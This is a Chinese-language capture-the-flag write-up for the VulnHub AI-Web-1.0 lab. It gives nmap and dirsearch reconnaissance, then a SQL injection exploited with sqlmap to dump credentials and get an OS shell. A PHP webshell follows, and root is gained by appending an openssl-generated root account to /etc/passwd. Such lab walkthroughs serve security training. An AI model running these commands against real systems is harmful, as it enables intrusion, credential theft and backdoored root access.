AI-Web-1.0靶场

准备阶段

下载地址

Download: https://drive.google.com/open?id=140bO4W6v7fd_dWhCmcFHTf86zwL9s_xP

Download (Mirror): https://download.vulnhub.com/aiweb/AI-Web-1.0.7z

网络设置

将网络设置为桥接模式

信息收集

端口扫描nmap

网络使用了NAT模式,先查看本机的VMware8(默认)虚拟网卡的网段

网段为192.168.52.1/24,使用nmap探测靶场网段

nmap -sn 192.168.52.1/24

-sn:禁用端口扫描

得知靶机IP为:192.168.52.130

接下来使用一些常规扫描

nmap -sV -O -sT 192.168.52.131

-sV:执行版本探测,尝试确定开放端口上运行的服务和版本信息

-O:开启操作系统探测,尝试推断目标主机运行的操作系统类型及其版本

-sT:执行TCP Connect扫描,这是最基本的扫描类型,通过建立完整的TCP连接来检测端口状态

nmap -sU 192.168.52.131

-sU:执行UDP扫描,用于探测开放的UDP端口

目录扫描dirsearch

对网站目录进行扫描

python37 dirsearch.py -u http://192.168.52.130/ -x 404

-x:排除指定状态码

指纹识别dismap

dismap-0.4-windows-amd64.exe -u http://192.168.52.130/

收集汇总

  1. 靶机为Linux系统,什么版本的目前不清楚
  2. 只开放了80端口,使用的Apache服务
  3. 敏感目录为robots.txt

渗透过程

访问网站和敏感文件目录

首先是默认的80端口

只有一句话,翻译:甚至不用谷歌搜索我的内容

http://192.168.52.130/

访问robots.txt文件

发现其他的敏感目录

http://192.168.52.130/robots.txt

m3diNf0目录

对网站的m3diNf0目录进行扫描
python37 dirsearch.py -u http://192.168.52.130/m3diNf0 -x 404

-x:排除指定状态码

phpinfo页面

发现网站根目录: /home/www/html/web1x443290o2sdf92213

se3reTdir777目录

发现一个搜索框

se3reTdir777/uploads/目录

SQL注入

判断是否存在

首先输入1,回显了账号密码

再输入1',此时发生了报错

使用burpsuite抓包,对其进行深入判断

此时我的TsojanScan插件判断出来了两种注入类型

报错注入

延时注入

手工判断后发现确实存在注入,注入点为uid

SQLmap一把梭-《梭哈是一种智慧》

将uid后面的参数改为*

SQLmap会自动识别

然后鼠标右键-->Copy to file-->添加文件名和后缀-->保存到桌面

将txt文件移动到SQLmap的目录下面

之前已经爆出了数据库名,现在直接获取所有内容

如果为移动文件夹,那么-r后面直接加入文件路径,比如:C:\Users\用户名\Desktop\1.txt

python37 sqlmap.py -r ./1.txt -D aiweb1 --dump

-r:指定文件

-D:数据库名

--dump:获取所有内容 注意:不推荐!!!因为这是靶机,所以才使用

看见等于号,立马判断是base64编码,进行解密后

RmFrZVVzZXJQYXNzdzByZA==;FakeUserPassw0rd

TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ==;MyEvilPass_f908sdaf9_sadfasf0sa

TjB0VGhpczBuZUFsczA=;N0tThis0neAls0

SQLmap获取shell
python37 sqlmap.py -r ./1.txt --os-shell

--os-shell:获取对网站进行shell获取

将网站和发现的根目录拼接起来,得到

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

访问http://192.168.52.130/se3reTdir777/uploads/tmpubgnv.php

上传php木马后,使用哥斯拉连接

提权

openssl提权

首先查whoami,并不是root权限

查看/etc/passwd文件,看看有那些权限

使用openssl添加用户

openssl passwd -1 -salt h 123456

添加用户h密码为123456

将用户写入/etc/passwd文件里

echo 'h:$1$h$DcmWd6ffV7pl4.0.1QBQ40:0:0:root:/root:/bin/bash'>>/etc/passwd

查看/etc/passwd文件,是否有写入进去

成功写入

cat /etc/passwd

切换h用户

su h

输入密码后whoami,显示为root,完成提权

查看flag

cat /root/flag.txt

总结

  1. 确认靶机IP
  2. 端口和目录扫描
  3. 使用SQLmap进行注入获取shell
  4. 使用openssl提权
  • 18
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值